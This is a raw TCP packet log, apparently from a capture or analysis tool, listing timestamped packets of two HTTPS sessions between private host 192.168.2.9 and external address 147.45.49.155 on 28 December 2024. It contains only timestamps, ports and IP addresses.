Dec 28, 2024 09:35:39.265165091 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.272211075 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.272228003 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.272277117 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.272305012 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.272319078 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.272408962 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.280376911 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.280410051 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.280435085 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.280471087 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.280487061 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.280508995 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.288178921 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.288209915 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.288255930 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.288283110 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.288302898 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.288630009 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.296284914 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.296313047 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.296401978 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.296415091 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.296467066 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.304577112 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.304606915 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.304668903 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.304687023 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.304713011 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.304728031 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.312617064 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.441277981 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.441317081 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.441356897 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.441390038 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.441405058 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.441428900 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.449315071 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.449346066 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.449376106 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.449385881 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.449404955 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.449421883 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.456391096 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.456413031 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.456455946 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.456465960 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.456501007 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.456509113 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.464613914 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.464649916 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.464684963 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.464690924 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.464714050 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.464732885 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.472177982 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.472198963 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.472235918 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.472240925 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.472279072 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.472292900 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.480315924 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.480330944 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.480369091 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.480376005 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.480401993 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.480423927 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.488401890 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.488420010 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.488456964 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.488465071 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.488506079 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.488523960 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.495485067 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.495512009 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.495551109 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.495557070 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.495587111 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.495613098 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.633397102 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.633429050 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.633521080 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.633550882 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.633567095 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.634979010 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.641407013 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.641438961 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.641485929 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.641496897 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.641547918 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.641613960 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.648567915 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.648592949 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.648685932 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.648691893 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.648720980 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.648731947 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.653130054 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.653194904 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.653202057 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.653213978 CET	443	49722	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:39.653256893 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:39.672786951 CET	49722	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:41.463397980 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:41.463443041 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:41.463498116 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:41.467045069 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:41.467073917 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:43.022828102 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:43.022917986 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:43.027405024 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:43.027439117 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:43.027729034 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:43.037609100 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:43.083339930 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:43.644222975 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:43.787935972 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:43.845177889 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:43.845189095 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:43.845232010 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:43.845247984 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:43.845263004 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:43.845268965 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:43.845295906 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:43.845314980 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:43.845338106 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:43.899472952 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:43.899488926 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:43.899545908 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:43.899557114 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:43.899564028 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:43.899586916 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:43.899610996 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:43.903001070 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.046488047 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.046499968 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.046540976 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.046569109 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.046593904 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.046618938 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.046633959 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.046700001 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.075372934 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.075395107 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.075454950 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.075476885 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.075491905 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.075546980 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.104815006 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.104837894 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.104917049 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.104943037 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.104960918 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.105020046 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.129935980 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.129960060 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.130008936 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.130023956 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.130039930 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.130101919 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.249229908 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.249257088 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.249322891 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.249352932 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.249366045 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.249486923 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.269474983 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.269496918 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.269562006 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.269587994 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.269712925 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.287303925 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.287333012 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.287377119 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.287396908 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.287427902 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.287446976 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.299907923 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.299932003 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.299979925 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.300007105 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.300020933 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.300263882 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.310794115 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.310810089 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.310852051 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.310867071 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.310890913 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.310909986 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.350500107 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.350522041 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.350605011 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.350624084 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.350851059 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.451212883 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.451231956 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.451311111 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.451344967 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.454998970 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.460725069 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.460741997 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.460809946 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.460825920 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.461072922 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.471622944 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.471641064 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.471700907 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.471716881 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.471744061 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.471771955 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.482403040 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.482420921 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.482475042 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.482489109 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.482513905 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.482532024 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.491858959 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.491875887 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.491950989 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.491965055 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.492671013 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.503503084 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.503529072 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.503596067 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.503622055 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.505996943 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.512972116 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.512990952 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.513040066 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.513058901 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.513204098 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.641446114 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.641469955 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.641529083 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.641557932 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.641577959 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.641660929 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.654679060 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.654696941 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.654757977 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.654777050 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.654805899 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.654824018 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.662816048 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.662834883 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.662904024 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.662919998 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.662957907 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.662981033 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.671036005 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.671052933 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.671097040 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.671111107 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.671137094 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.671152115 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.678281069 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.678298950 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.678348064 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.678361893 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.678390026 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.678412914 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.685976028 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.685992956 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.686038971 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.686054945 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.686088085 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.686104059 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.694216967 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.694231987 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.694314003 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.694329977 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.694380045 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.702368021 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.702384949 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.702445984 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.702461004 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.702501059 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.842627048 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.842653990 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.842727900 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.842753887 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.842796087 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.855397940 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.855417013 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.855470896 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.855488062 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.855562925 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.862663984 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.862683058 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.862729073 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.862744093 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.862757921 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.862777948 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.870058060 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.870075941 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.870147943 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.870162010 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.870198965 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.876507044 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.876526117 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.876590967 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.876605988 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.876635075 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.876655102 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.883836985 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.883853912 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.883934021 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.883949041 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.883995056 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.884016991 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.890863895 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.890896082 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.890933037 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.890945911 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.890979052 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.890999079 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.898013115 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.898027897 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.898061991 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.898075104 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:44.898098946 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:44.898122072 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.043927908 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.043953896 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.043992996 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.044017076 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.044034004 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.044051886 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.056423903 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.056442022 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.056484938 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.056504011 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.056519032 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.056596994 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.063489914 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.063508034 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.063563108 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.063579082 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.063602924 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.063617945 CET	49728	443	192.168.2.9	147.45.49.155
